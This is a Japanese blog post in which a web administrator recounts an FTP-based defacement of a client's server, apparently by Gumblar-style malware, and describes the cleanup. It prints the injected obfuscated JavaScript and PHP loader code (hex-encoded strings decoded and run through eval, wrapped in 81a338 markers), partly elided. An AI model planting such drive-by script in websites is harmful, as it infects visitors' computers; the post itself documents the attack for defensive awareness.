WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

*

サブコンテンツ

危険な高額塾

タグ

explorer 上位表示 ヤフーショッピング メモ ムーバブルタイプ ブラクラ スタイルシート getElementByTagName 切抜き Extension Manager 大西良幸 日本語入力変換ソフト 秀吉塾天下統一 伊藤 虎太郎 バナー ざくざく君 Ban Hammer パズル LinkShaker force puzzle @PAGES トレンドキーワード 大園式転売塾 ブラウザ レビュー 賢威 高額塾 Thunderbird 北川 雅嗣 クロスアフィリエイト 株式会社Free Agent Style office フレンドシップメール アレックス式ネオせどりスクール 転売大園塾 functions.php アドセンス せどり アレックス レイアウト崩れ サイト改ざん postpost 関根塾 ping 大園麗花 出店料 CGI 個人情報 関根義光 マルウエア IBS DOCTYPE 切り抜き Tiger-Wing カスタマイズ ボタン プロファイル Yahoo RSS Includes Pages もざ 自動 掲示板 IE 管理ツール Youtube SmoothScroll.js Favicon followmatic プロモーション SEO ネットゲーム 比較 ユーチューブマニアクス2017 ブラシ BBIZ 蝶乃舞 Windows JavaScript 与沢翼 Windows 7 CS6 ヤフオク 石井匠 document.all クラウド変換 短縮URL シャンプー 秒速で1億円稼ぐ男 表示 ビジネス ライブチャット android ドメイン SyntaxHighlighter インペリアルゴールド 無料 音量アイコン wpXサーバー ライオンアフィリエイト MasterCollection 村上省吾 CS5 RSS 中山秀人 大園転売塾 与沢翼×蝶乃舞 インターネットビジネススクール 特定のメールアドレス アクセス制限 到達率 WP ぼかし 不労所得の神 html セキュリティ Firefox モザイク 権利収入 サンタ プラグイン Wordpress Content Slide 小笠原健一 バイドゥー Cash on Wordpress 詐欺 エキスパートメール 伊藤虎太郎 ワードプレス 無断送信 iphone ソースコード PPC 株式会社SRシステム がら空きビジネス 放射線 css やしろひろたみ 久積篤史 トレンドアフィリエイト ネットビジネス大全集 グラデーション 定型文 アイコン アフィリエイト YouTube Maniax 2017 PHP スカイプ スムーズ 詐欺組織 ウイルス 固定ページ DTD 優先順位 twitter リンクシェイカー ping送信 不正アクセス ネットビジネス最後の楽園 復元 HTML4.0 Baidu Newpost Catch インターネット クリックランキング ツール 改竄 アンダーグラウンドメソッド 感染 moza SKナレッジ 百度 不正送信 ネットビジネス MT ヤフー ネオヒルズアカデミー 自己アフィリ Diamond Affiliate Masters Program 株式会社バンザイ 伊藤 歩 背景 テンプレート system マニュアル ECサイト 無料オファー EC 81a338 バックアップ ネットガレージ ツイッター コピーボタン 配布 アクセスアップ 自動化 Line ネットショップ RMT wordpress 立体 Google Maps API tool 新井浩 エクスプローラー レイアウト 株式会社A-ブログレス 土屋ひろし 副業術 伊藤塾 IP getElementById ブロックポリシー レンタルサーバー タスクバー 情報商材 原田真 クラウド入力機能 Login LockDown ソース WEB エクスチェンジ 申請金ビジネス やしろ塾 クラック ウインドウ Adobe 加工 High Concept Marketing 株式会社WINGOOD メルマガ配信システム アンダーグラウンドアフィリエイトクラブ 宮田麗花 スマホ 加藤 秀吉 ブルートフォースアタック 人物 バイマ 登録禁止 ロリポップ 短縮URLツール 特権ビジネス 既得権益 レタープレス FTP 画像 FireWorks Internet Explorer タイガーウイング ファビコン Google Maps ソフト マイクロソフト 株式会社ニュース BUYMA 山下 テーマ 流出 ライン 池田純矢 管理画面 KMSpico wp-login.php 三橋美仁 XHTML 脆弱性 デスクトップ インフォトップ ブロック MovableTYpe 高速ゲーム 改ざん トラフィック 量産 フォローマティック Chrome エディタ 滑らか ハート インターネットエクスプローラー .htaccess google 個人情報流出 Agency Business ランキング 株式会社SRシステム スクロール 自己アフィリエイト KMS認証 球体 アフィ匠

アーカイブ

エステトラブル

このページの先頭へ